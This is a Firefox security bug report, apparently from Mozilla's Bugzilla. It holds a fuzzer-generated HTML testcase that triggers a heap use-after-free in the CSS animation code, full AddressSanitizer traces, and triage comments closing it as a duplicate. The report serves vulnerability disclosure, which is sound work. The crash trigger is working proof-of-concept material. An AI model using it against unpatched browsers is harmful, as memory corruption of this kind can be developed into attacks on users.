Closed Bug 1317500 Opened 8 years ago Closed 8 years ago

heap-use-after-free in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint

Categories

(Core :: DOM: Animation, defect)

Product:
Core
Component:
DOM: Animation
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1289701
Tracking Flags:
Tracking Status
firefox53 --- affected

People

(Reporter: nils, Unassigned)

Details

(Keywords: csectype-uaf, sec-critical) 

The following testcase crashes the latest ASAN build of Firefox (BuildID=20161113140512).

crash.html:

<script>
function start() {
        o1=document.documentElement;
        o10=document.createElement('area');
        o104=document.createElement('spacer');
        o121=document.createElement('tr');
        o143=document.createElement('track');
        o216=document.createRange();
        o337=document.createElement('dialog');
        o337.innerHTML="<svg x><style>";
        o346=o337.querySelectorAll('*')[1];
        o121.innerHTML="<style>@font-face{ font-family: font7; src: url() format('eot')}.class2{}\n*{ font-size: 85rem!important; all: initial;>";
        o10.appendChild(o1);
        o216.surroundContents(o143);
        document.documentElement.appendChild(o121);
        document.documentElement.appendChild(o104);
        o104.innerHTML="<svg><style>@keyframes{{}}*{ animation-name: key12; animation-duration: 0.001s;}{}\n@keyframes key12{ from{ font: larger Helvetica";
        o216.surroundContents(o346);
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==8716==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000340db8 at pc 0x7fdbe2711e96 bp 0x7ffcb9317ad0 sp 0x7ffcb9317ac8
READ of size 4 at 0x615000340db8 thread T0 (Web Content)
    #0 0x7fdbe2711e95 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1262:54
    #1 0x7fdbe2700f54 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:333:5
    #2 0x7fdbe27005ab in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/dom/animation/EffectCompositor.cpp:274:5
    #3 0x7fdbe6a69d26 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:976:7
    #4 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #5 0x7fdbe6ba6a9e in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, mozilla::StyleDisplay) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3483:9
    #6 0x7fdbe6ba0aa8 in DoRestyleUndisplayedDescendants /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3428:3
    #7 0x7fdbe6ba0aa8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3414
    #8 0x7fdbe6b9f8db in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3221:3
    #9 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #10 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #11 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #12 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #13 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #14 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #15 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #16 0x7fdbe6ba5184 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3393:7
    #17 0x7fdbe6b8a7f4 in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3803:3
    #18 0x7fdbe6b894d1 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:764:3
    #19 0x7fdbe6bade56 in BeginProcessingRestyles /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:871:5
    #20 0x7fdbe6bade56 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:154
    #21 0x7fdbe6b91474 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #22 0x7fdbe6b91474 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #23 0x7fdbe6dcd36f in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #24 0x7fdbe6dcd36f in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4135
    #25 0x7fdbe6ae8be1 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #26 0x7fdbe6af5230 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #27 0x7fdbe6af4eb8 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:317:5
    #28 0x7fdbe6af6dd4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:501:9
    #29 0x7fdbe7469124 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #30 0x7fdbe1199def in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:233:20
    #31 0x7fdbe0cb8613 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1571:16
    #32 0x7fdbe0bf4555 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:14
    #33 0x7fdbe0bf0a7c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1668:17
    #34 0x7fdbe0bf31e4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1569:5
    #35 0x7fdbe0bf36ee in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1592:5
    #36 0x7fdbdfe2cc4b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1175:7
    #37 0x7fdbdfead1bc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #38 0x7fdbe0bfba1f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #39 0x7fdbe0b6e858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #40 0x7fdbe0b6e858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #41 0x7fdbe0b6e858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #42 0x7fdbe643edaf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #43 0x7fdbe85b95a7 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:869:12
    #44 0x7fdbe0b6e858 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #45 0x7fdbe0b6e858 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #46 0x7fdbe0b6e858 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #47 0x7fdbe85b8ae3 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:7
    #48 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #49 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:392
    #50 0x7fdbfb26782f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #51 0x41ba08 in _start (/home/nils/MonkeyFarm/firefox/firefox+0x41ba08)

0x615000340db8 is located 56 bytes inside of 512-byte region [0x615000340d80,0x615000340f80)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fdbdfc3f8e1 in Free /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:197:34
    #2 0x7fdbdfc3f8e1 in nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::ShrinkCapacity(unsigned long, unsigned long) /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:230
    #3 0x7fdbe2700e52 in Clear /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1635:18
    #4 0x7fdbe2700e52 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:943
    #5 0x7fdbe2700e52 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2146
    #6 0x7fdbe2700e52 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:324
    #7 0x7fdbe2710e68 in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(nsTArray<mozilla::Keyframe>&&, nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:207:5
    #8 0x7fdbe684ed69 in UpdateOldAnimationPropertiesWithNew /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:337:7
    #9 0x7fdbe684ed69 in CSSAnimationBuilder::Build(nsPresContext*, mozilla::StyleAnimation const&, nsCSSKeyframesRule const*) /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:610
    #10 0x7fdbe684d7f6 in nsAnimationManager::BuildAnimations(nsStyleContext*, mozilla::dom::Element*, mozilla::AnimationCollection<mozilla::dom::CSSAnimation>*, nsTArray<RefPtr<mozilla::dom::CSSAnimation> >&) /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:1077:33
    #11 0x7fdbe684cd55 in nsAnimationManager::UpdateAnimations(nsStyleContext*, mozilla::dom::Element*) /home/worker/workspace/build/src/layout/style/nsAnimationManager.cpp:400:5
    #12 0x7fdbe6a69ca8 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:974:7
    #13 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #14 0x7fdbe6a6e239 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350:10
    #15 0x7fdbe69ca76d in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:84:3
    #16 0x7fdbe69ca76d in CalcLengthWith(nsCSSValue const&, int, nsStyleFont const*, nsStyleContext*, nsPresContext*, bool, bool, mozilla::RuleNodeCacheConditions&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:570
    #17 0x7fdbe6ad1581 in SetFontSizeCalcOps::ComputeLeafValue(nsCSSValue const&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:3346:14
    #18 0x7fdbe6a2bc76 in nsRuleNode::SetFontSize(nsPresContext*, nsRuleData const*, nsStyleFont const*, nsStyleFont const*, int*, nsFont const&, int, int, bool, bool, mozilla::RuleNodeCacheConditions&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:3440:14
    #19 0x7fdbe6a312f5 in nsRuleNode::SetFont(nsPresContext*, nsStyleContext*, unsigned char, nsRuleData const*, nsStyleFont const*, nsStyleFont*, bool, mozilla::RuleNodeCacheConditions&) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:4026:3
    #20 0x7fdbe69d56f0 in nsRuleNode::ComputeFontData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:4285:5
    #21 0x7fdbe69cfdb1 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2622:10
    #22 0x7fdbe69d0811 in nsStyleContext::StyleData(nsStyleStructID) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:468:15
    #23 0x7fdbe2717bc7 in mozilla::dom::CreateStyleContextForAnimationValue(nsCSSPropertyID, mozilla::StyleAnimationValue const&, nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1244:3
    #24 0x7fdbe2711b16 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1258:9
    #25 0x7fdbe2700f54 in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:333:5
    #26 0x7fdbe27005ab in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/dom/animation/EffectCompositor.cpp:274:5
    #27 0x7fdbe6a69d26 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:976:7
    #28 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #29 0x7fdbe6ba6a9e in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, mozilla::StyleDisplay) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3483:9
    #30 0x7fdbe6ba0aa8 in DoRestyleUndisplayedDescendants /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3428:3
    #31 0x7fdbe6ba0aa8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3414
    #32 0x7fdbe6b9f8db in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3221:3
    #33 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #34 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #35 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #36 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5

previously allocated by thread T0 (Web Content) here:
    #0 0x4b27ce in realloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:71:3
    #1 0x4e0f1d in moz_xrealloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:105:20
    #2 0x7fdbdfc3fee1 in Realloc /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:209:12
    #3 0x7fdbdfc3fee1 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayInfallibleAllocator>(unsigned long, unsigned long) /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:183
    #4 0x7fdbe27278db in AppendElements<nsTArrayInfallibleAllocator> /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1588:34
    #5 0x7fdbe27278db in AppendElement<nsTArrayInfallibleAllocator> /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1616
    #6 0x7fdbe27278db in BuildSegmentsFromValueEntries /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:1259
    #7 0x7fdbe27278db in mozilla::KeyframeUtils::GetAnimationPropertiesFromKeyframes(nsTArray<mozilla::Keyframe> const&, nsTArray<nsTArray<mozilla::PropertyStyleAnimationValuePair> > const&, nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:694
    #8 0x7fdbe2700b5e in mozilla::dom::KeyframeEffectReadOnly::UpdateProperties(nsStyleContext*) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:298:7
    #9 0x7fdbe27005ab in mozilla::EffectCompositor::UpdateEffectProperties(nsStyleContext*, mozilla::dom::Element*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/dom/animation/EffectCompositor.cpp:274:5
    #10 0x7fdbe6a69d26 in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:976:7
    #11 0x7fdbe6a6ea03 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1392:10
    #12 0x7fdbe6ba6a9e in mozilla::ElementRestyler::RestyleUndisplayedNodes(nsRestyleHint, mozilla::UndisplayedNode*, nsIContent*, nsStyleContext*, mozilla::StyleDisplay) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3483:9
    #13 0x7fdbe6ba0aa8 in DoRestyleUndisplayedDescendants /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3428:3
    #14 0x7fdbe6ba0aa8 in mozilla::ElementRestyler::RestyleUndisplayedDescendants(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3414
    #15 0x7fdbe6b9f8db in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3221:3
    #16 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #17 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #18 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #19 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #20 0x7fdbe6ba26bc in mozilla::ElementRestyler::RestyleContentChildren(nsIFrame*, nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3729:13
    #21 0x7fdbe6b9f9ad in mozilla::ElementRestyler::RestyleChildren(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3251:7
    #22 0x7fdbe6b988ce in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:2294:5
    #23 0x7fdbe6ba5184 in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&, nsTArray<mozilla::ElementRestyler::ContextToClear>&, nsTArray<RefPtr<nsStyleContext> >&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3393:7
    #24 0x7fdbe6b8a7f4 in mozilla::RestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:3803:3
    #25 0x7fdbe6b894d1 in mozilla::RestyleManager::StartRebuildAllStyleData(mozilla::RestyleTracker&) /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:764:3
    #26 0x7fdbe6bade56 in BeginProcessingRestyles /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:871:5
    #27 0x7fdbe6bade56 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:154
    #28 0x7fdbe6b91474 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:490:7
    #29 0x7fdbe6b91474 in mozilla::RestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/RestyleManager.cpp:834
    #30 0x7fdbe6dcd36f in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #31 0x7fdbe6dcd36f in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4135
    #32 0x7fdbe6ae8be1 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #33 0x7fdbe6af5230 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #34 0x7fdbe6af4eb8 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:317:5
    #35 0x7fdbe6af6dd4 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:501:9
    #36 0x7fdbe7469124 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:5
    #37 0x7fdbe1199def in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:233:20

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1262:54 in mozilla::dom::KeyframeEffectReadOnly::CalculateCumulativeChangeHint(nsStyleContext*)
Shadow bytes around the buggy address:
  0x0c2a80060160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80060170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80060180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a80060190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c2a800601b0: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
  0x0c2a800601c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a800601f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a80060200: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==8716==ABORTING
Flags: needinfo?(bbirtles)
Keywords: csectype-uaf, sec-critical
Hiro, care to take a look?
Flags: needinfo?(bbirtles) → needinfo?(hiikezoe)
Sure. I suspect this is another variant of bug 1289701.
I will check whether the patch for bug 1289701 fixes this or not.
Flags: needinfo?(hiikezoe)
Confirmed.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty-
Group: core-security
You need to log in before you can comment on or make changes to this bug.